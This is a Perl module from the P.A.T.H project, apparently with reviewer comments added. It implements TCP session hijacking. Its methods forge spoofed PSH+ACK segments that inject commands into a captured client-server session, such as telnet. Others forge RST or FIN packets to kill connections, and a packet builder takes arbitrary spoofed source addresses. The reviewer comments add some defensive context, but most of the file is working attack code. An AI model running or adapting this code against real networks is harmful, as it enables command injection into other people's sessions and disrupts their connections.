
📄 hijack.pm

📁 一个rst守护程序
	# If it was found, delete it...
        for($i=0; $i < scalar(@{$obj->{hijacked}}); $i++)
        {
            if( ($obj->{hijacked}->[$i] eq "$src $dst") || ($obj->{hijacked}->[$i] eq "$dst $src") )
            {
                splice(@{$obj->{hijacked}},$i,$i+1);
                last;
            }
        }
    }
    # Delete all entries
    else
    {
        @{$obj->{hijacked}} = ();
    }
    return $obj;
}

# Method hijacked() checks whether the connection has already been
# hijacked.
# Parameter: Pcap packet object
# Returns: 1 if the packet's source/destination IP pair (in either order)
# equals an entry of $obj->{hijacked}, otherwise 0. Only the two IP
# addresses are compared; ports are not part of the comparison.
sub hijacked
{
    my $obj = shift;
    my $packet = shift;

    # Decode packet
    # NOTE(review): $ip and $tcp are not declared with "my" in this sub, and
    # $tcp is decoded but not read again here.
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Entries are strings of the form "<ip> <ip>"; test both orderings.
    for(@{$obj->{hijacked}})
    {
        if( ($ip->{src_ip} . " " . $ip->{dst_ip} eq $_) ||  ($ip->{dst_ip} . " " . $ip->{src_ip} eq $_) )
        {
            return 1;
        }
    }
    return 0;
}

###[ HIJACKING METHODS ]###

# NOTE(review): the methods in this section emit forged TCP segments whose
# addresses, ports and sequence numbers are copied from fields stored on
# the object (presumably filled from captured traffic by methods outside
# this view -- confirm). infiltrate() and greet_client() always set
# window => "2323"; that fixed value is an artifact network monitoring can
# match on. An injected payload is only meaningful to the peer when the
# session is cleartext; an authenticated, encrypted transport does not
# accept data it did not originate, although forged resets can still tear
# down the underlying TCP connection unless the segments themselves are
# authenticated (e.g. TCP-AO, IPsec).

# Method infiltrate() infiltrates a command on server side
# Parameter: Command to infiltrate (a "\n" is appended to it as payload)
# Sends exactly one PSH+ACK segment and prints a one-line summary.
sub infiltrate
{
    my($obj,$command) = @_;
    my $packet = new Net::RawIP;

    # Are we running in stateful mode?
    # Then inject the packet spoofed from the client to the server
    if($obj->{stateful})
    {
        # Source is the stored client endpoint, destination the stored
        # server endpoint; seq is taken from server_ack and ack_seq from
        # client_ack.
        $packet->set({
            ip => {
                saddr => $obj->{client_ip},
                daddr => $obj->{server_ip}
            },
            tcp => {
                source => $obj->{client_port},
                dest => $obj->{server_port},
                psh => 1,
                ack => 1,
                seq => $obj->{server_ack},
                ack_seq => $obj->{client_ack},
                window => "2323",
                data => "$command\n"
                }
        });

        print "Hijacked " . $obj->{client_ip} . ":" . $obj->{client_port} . " --> " . $obj->{server_ip} . ":" . $obj->{server_port} . "  SEQ: " . $obj->{server_ack} . " Command: $command\n";
    }
    # We are running in stateless mode
    else
    {
        # Uses the generic src/dest fields and the stored seqnum/acknum
        # instead of the per-role client/server fields.
        $packet->set({
            ip => {
                saddr => $obj->{src_ip},
                daddr => $obj->{dest_ip}
            },
            tcp => {
                source => $obj->{src_port},
                dest => $obj->{dest_port},
                psh => 1,
                ack => 1,
                seq => $obj->{seqnum},
                ack_seq => $obj->{acknum},
                window => "2323",
                data => "$command\n"
                }
        });

        print "Hijacked " . $obj->{src_ip} . ":" . $obj->{src_port} . " --> " .
            $obj->{dest_ip} . ":" . $obj->{dest_port} . "  SEQ: " . $obj->{seqnum} . " Command: $command\n";
    }

    # Net::RawIP send(delay, times): no delay, sent once.
    $packet->send(0,1);
}

# Method greet_client() sends a message to the client and resets the
# connection.
# This method only makes sense in stateful mode; in stateless mode it
# prints a notice and returns without sending anything.
# Parameter: String for the poor client (used as the segment payload,
# without an added newline)
sub greet_client
{
    my($obj,$command) = @_;
    my $packet = new Net::RawIP;

    # Are we running in stateful mode?
    unless($obj->{stateful}) { print "You are not running in stateful mode!\n"; return; }

    # Create the packet...
    # Source is the stored server endpoint, destination the stored client
    # endpoint; the RST flag is set and the message travels as data.
    $packet->set({
        ip => {
            saddr => $obj->{server_ip},
            daddr => $obj->{client_ip}
        },
        tcp => {
            source => $obj->{server_port},
            dest => $obj->{client_port},
            rst => 1,
            seq => $obj->{client_ack},
            ack_seq => $obj->{server_ack},
            window => "2323",
            data => $command
            }
    });

    # ...and send it over the wire
    $packet->send(0,1);
}

# Create and send a Reset packet
# The first parameter to pass is a reset flag (RST|FIN)
# the second one is only necessary in stateful mode and
# tells the target direction (client|server)
#
# The flag is lower-cased before comparison; any value other than "fin"
# results in an RST segment. In stateful mode any target other than
# "server" is treated as the client direction. Returns early, sending
# nothing, when $obj->is_hijackable is false.
sub reset
{
    my $obj = shift;
    my $flag = shift;
    my $target = shift;
    my $packet = new Net::RawIP;
    my($src_ip,$dest_ip,$src_port,$dest_port,$seqnum);
    $flag = lc($flag);

    unless($obj->is_hijackable) { return; }

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
        print "We are running in stateful mode!\n";

        # Which direction should be reset?
        if($target eq "server")
        {
            # Forge the segment as coming from the client.
            $src_ip = $obj->{client_ip};
            $dest_ip = $obj->{server_ip};
            $src_port = $obj->{client_port};
            $dest_port = $obj->{server_port};
            $seqnum = $obj->{server_ack};
        }
        else
        {
            # Forge the segment as coming from the server.
            $src_ip = $obj->{server_ip};
            $dest_ip = $obj->{client_ip};
            $src_port = $obj->{server_port};
            $dest_port = $obj->{client_port};
            $seqnum = $obj->{client_ack};
        }
    }

    # We are running in stateless mode
    else
    {
        # The stored src/dest fields are swapped, so the segment is
        # addressed back to the stored source, with seq taken from acknum.
        $src_ip = $obj->{dest_ip};
        $dest_ip = $obj->{src_ip};
        $src_port = $obj->{dest_port};
        $dest_port = $obj->{src_port};
        $seqnum = $obj->{acknum};
    }

    # Reset via FIN packet
    if($flag eq "fin")
    {
        # Create the packet
        $packet->set({
            ip => {
                saddr => $src_ip,
                daddr => $dest_ip
                },
                    tcp => {
                        source => $src_port,
                        dest => $dest_port,
                        fin => "1",
                        seq => $seqnum,
                    }
        });
    }

    # Reset via RST packet
    else
    {
        # Create the packet
        $packet->set({
            ip => {
                saddr => $src_ip,
                daddr => $dest_ip
            },
            tcp => {
                source => $src_port,
                dest => $dest_port,
                rst => 1,
                seq => $seqnum
            }
        });
    }

    # ...and throw it on the wire!
    $packet->send(0, 1);

    print "Send $flag packet. $src_ip:$src_port --> $dest_ip,$dest_port SEQ: $seqnum\n";
}

###[ Special functions ]###

# Create a packet (Net::RawIP object)
# from a config object
#
# Parameter: either a plain hash reference of options (protocol is read
# from its 'protocol' key) or an object providing get_opt() and
# get_protocol().
# Returns: the Net::RawIP object. Protocol "tcp", "udp" and "icmp" select
# the matching header; any other value yields an IP-only packet.
#
# NOTE(review): the IP source address comes from the 'spoof' option, i.e.
# it is whatever the caller supplies. Networks that filter on source
# address at ingress/egress (BCP 38) drop such packets when the address
# does not belong to the sending network.
sub create_packet
{
    my $cfg_obj = shift;
    my (%config, $protocol);

    # Do we already have a reference to an option hash?
    # NOTE(review): HASH is an unquoted bareword; it is only read as the
    # string "HASH" when strict subs is off. The file preamble is not
    # visible here -- confirm.
    if(ref($cfg_obj) eq HASH)
    {
        %config = %{$cfg_obj};
        $protocol = $config{'protocol'};
    }
    else
    {
        %config = $cfg_obj->get_opt();
        $protocol = $cfg_obj->get_protocol();
    }

    # NOTE(review): $packet is not declared with "my" in this sub.

    # Create a TCP / IP packet
    if($protocol eq "tcp")
    {
        $packet = new Net::RawIP;
        # Every header field below is copied from the option hash; the
        # payload always gets "\r\n" appended.
        $packet->set({
            ip => {
                saddr => $config{'spoof'},
                daddr => $config{'target'},
                frag_off => $config{'frag'},
                ttl => $config{'ttl'}
            } ,
            tcp => {
                source => $config{'src_port'},
                dest => $config{'dst_port'},
                syn => $config{'syn'},
                ack => $config{'ack'},
                fin => $config{'fin'},
                rst => $config{'rst'},
                psh => $config{'psh'},
                urg => $config{'urg'},
                seq => $config{'seq'},
                ack_seq => $config{'ack_seq'},
                window => $config{'win'},
                data => "$config{'data'}\r\n"
                }
        });
    }

    # Create a UDP / IP packet
    elsif($protocol eq "udp")
    {
        $packet = new Net::RawIP({udp =>{}});
        $packet->set({
            ip => {
                saddr => $config{'spoof'},
                daddr => $config{'target'}
            } ,
            udp => {
                source => $config{'src_port'},
                dest => $config{'dst_port'},
                data => "$config{'data'}\r\n"
                }
        });
    }

    # Create a ICMP / IP packet
    elsif($protocol eq "icmp")
    {
        $packet = new Net::RawIP({icmp => {}});
        # ttl, protocol and tos are fixed here (64, 1, 0) rather than read
        # from the option hash.
        $packet->set({
            ip  => { ttl      => 64,
                     protocol => 1,
                     tos      => 0,
                     saddr    => $config{'spoof'},
                     daddr    => $config{'target'},
                 },
            icmp=> { type    => $config{'icmp-type'},
                     code    => $config{'icmp-code'},
                     data    => "$config{'data'}\r\n",
                     gateway => $config{'gateway'},
                     mtu => $config{'mtu'}
                 }
        });
    }

    # Create IP only packet
    else
    {
        $packet = new Net::RawIP;
        $packet->set({
            ip => {
                saddr => $config{'spoof'},
                daddr => $config{'target'},
                frag_off => $config{'frag'},
                ttl => $config{'ttl'}
            }
        });
    }

    return $packet;
}

###[ Thats the end folks =) ]###
1;
__END__
###[ POD documentation ]###

=pod

=head2 NAME

   hijack.pm  --  P.A.T.H hijacking stuff

=head2 SYNOPSIS

   use hijack;
   use NET::PcapUtils;
   Net::PcapUtils::loop(\&sniffit,
                        PROMISC => 1,
                        FILTER => 'tcp and port 23',
                        DEV => 'eth0');

   sub sniffit
   {
       unless(defined $connection)
       {
           $connection = hijack->new($packet);
       }

      if($connection->is_established)
      {
         if( ($connection->check($packet)) && ($connection->check_port($packet,23,0)) )
         {
            $connection->update($packet);
            $connection->send_rst('rst');
         }
      }
   }

=head2 DESCRIPTION

   This module contains all the hijacking stuff of the P.A.T.H project.
   It supports stateful and stateless hijacking, connection resetting,
   packet infiltration and more.
   By default the module runs in stateless mode.
   If you want to run it in stateful mode use the stateful() method first.
   Please note that this module can only handle *one* connection in *one*
   object so if you want to handle more than one connection you have to
   store one hijack object per connection in an array or something like
   that. Maybe this will change in the future... Who knows? ;)

=head2 METHODS

   new
   check
   check_port
   check_ip
   check_flag
   stateful
   stateless
   set_server_seq
   server_seq
   set_client_seq
   client_seq
   is_established
   update
   update_seq
   is_hijackable
   is_hijacked
   hijacked
   unset_hijacked
   infiltrate
   greet_client
   reset
   create_packet

=head2 DESCRIPTION OF METHODS

=item B<new()>

   $connection = hijack->new($packet);
   This method creates a new stateless hijack object.
   It takes a Net::PcapUtils packet object as parameter.

=item B<check()>

   $connection->check($packet);
   This method simply checks if the packet has got the same
   source or destination port / ip as the last saved one.
   If you are running in stateful mode it will check if
   the specified packet either comes from the client and is
   sent to the server or the other way round.
   The method returns true if the packet belongs to "our"
   connection, otherwise it will return false.

=item B<check_port>

   $connection->check_port($packet,src,dest);
   Check_port() checks if the packet has got the specified src
   and destination port.
   You can choose a 0 or NULL if the number of one port is of
   no interest for you.
   The method returns true if the specified ports are found in
   the packet, otherwise it returns false.

=item B<check_ip>

   $connection->check_ip($packet,src,dest);
   The same as check_port(), but checks the IPs...

=item B<check_flag>

    $connection->check_flag($packet,$flag);
    Check if the given flag is set in the TCP header of
    the passed packet. If the flag is set this method
    returns true, otherwise it returns false.

=item B<stateful>

   $connection->stateful($packet,[server|client]);
    This method takes two options:
    A Net::PcapUtils packet object
    A direction: server or client
    Now the module can distinguish between a client
    and a server module. You can check the direction
    of the captured packet with the check_port() method.

=item B<stateless>

    $connection->stateless();
    This method tells the module that we don't want to run
    in stateful mode any more.

=item B<set_server_seq()>

   $connection->set_server_seq($packet);
    Save the sequence and acknowledgement number in the packet
    as server seq and ack.
    There is also a set_client_seq method.

=item B<server_seq()>

   $connection->server_seq()
    Returns true if the server sequence and acknowledgment numbers
    are known.
    There is also a client_seq method.
    This method only makes sense if you are running in stateful
    mode!

=item B<update()>

    $connection->update($packet);
    This method updates connection information in stateless
    connection hijacking.
    Use update_seq if you only want to update the sequence and
    acknowledgement numbers.

=item B<is_hijackable()>

    $connection->is_hijackable();
    Returns true if you can sniff the sequence and acknowledgement numbers.

=item B<is_hijacked>

    $connection->is_hijacked();
    Remember that you have already hijacked the connection.
    Use the hijacked() method to check if a connection was marked
    as hijacked before.

=item B<unset_hijacked>

    $connection->unset_hijacked($src_ip,$dst_ip);
    Remove the specified source and destination ip from the
    hijacked array so we can hijack the connection again.
    If no parameter is specified all hijacked connections are
    deleted!

=item B<infiltrate()>

    $connection->infiltrate($command);
    This method will send a spoofed packet from the client to the
    server with the specified payload.
    In stateful mode this method injects the command to the server,
    otherwise to the last specified destination ip and port.

=item B<greet_client()>

    $connection->greet_client("Hello lamer! Nice weather outside! =)");
    Use this method if you want to send a message to the client.
    This method can only be used in stateful mode.

=item B<reset()>

   $connection->reset($flag,$direction);
   The first parameter to pass is a reset flag (RST|FIN);
   the second one is only necessary in stateful mode and
   tells the target direction (client|server)

=item B<create_packet()>

    $packet = $connection->create_packet($cfg);
    This method takes a config object to create and return a
    Net::RawIP packet object.
    See config module documentation for more information.

=head2 BUGS

    Debug the following methods:
    logged_in

=head2 AUTHOR

    Bastian Ballmann [ bytebeater@crazydj.de ]
    http://www.crazydj.de

=head2 COPYRIGHT

    This module is free software.
    It is licensed under the GPL.
